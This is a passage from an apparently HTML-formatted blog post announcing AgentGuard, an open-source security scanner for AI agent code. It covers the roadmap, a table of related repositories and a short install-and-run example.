support</strong> — Rust, Go, Java, Ruby</li> <li> <strong>GitHub Code Scanning integration</strong> — native SARIF upload</li> <li> <strong>MCP scanner</strong> — audit MCP server configurations for malicious tools</li> <li> <strong>Real-time IDE feedback</strong> — deeper VS Code integration</li> </ul> <p>Full roadmap on <a href="https://github.com/dockfixlabs/agentguard/blob/main/ROADMAP.md" rel="noopener noreferrer">GitHub</a>.</p> <h2> Project Structure </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Repository</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td><a href="https://github.com/dockfixlabs/agentguard" rel="noopener noreferrer">agentguard</a></td> <td>Core scanner + CLI + MCP server</td> </tr> <tr> <td><a href="https://github.com/dockfixlabs/mcp-scanner" rel="noopener noreferrer">mcp-scanner</a></td> <td>MCP server configuration scanner</td> </tr> <tr> <td><a href="https://github.com/dockfixlabs/agentguard-app" rel="noopener noreferrer">agentguard-app</a></td> <td>GitHub App for automated PR reviews</td> </tr> <tr> <td><a href="https://github.com/dockfixlabs/agentguard-vscode" rel="noopener noreferrer">agentguard-vscode</a></td> <td>VS Code extension</td> </tr> <tr> <td><a href="https://github.com/dockfixlabs/agentguard-benchmark" rel="noopener noreferrer">agentguard-benchmark</a></td> <td>Benchmark suite with 28 samples</td> </tr> </tbody> </table></div> <h2> Getting Started </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pip <span class="nb">install </span>dfx-agentguard agentguard <span class="nb">.</span> <span class="nt">--format</span> text </code></pre> </div> <p>If you find this useful, star the repo on <a href="https://github.com/dockfixlabs/agentguard" rel="noopener noreferrer">GitHub</a>. Contributions welcome — see <a href="https://github.com/dockfixlabs/agentguard/blob/main/CONTRIBUTING.md" rel="noopener noreferrer">CONTRIBUTING.md</a>.</p> <p><em>AgentGuard is MIT-licensed and built by <a href="https://github.com/dockfixlabs" rel="noopener noreferrer">Dockfix Labs</a>.</em></p> ai security python opensource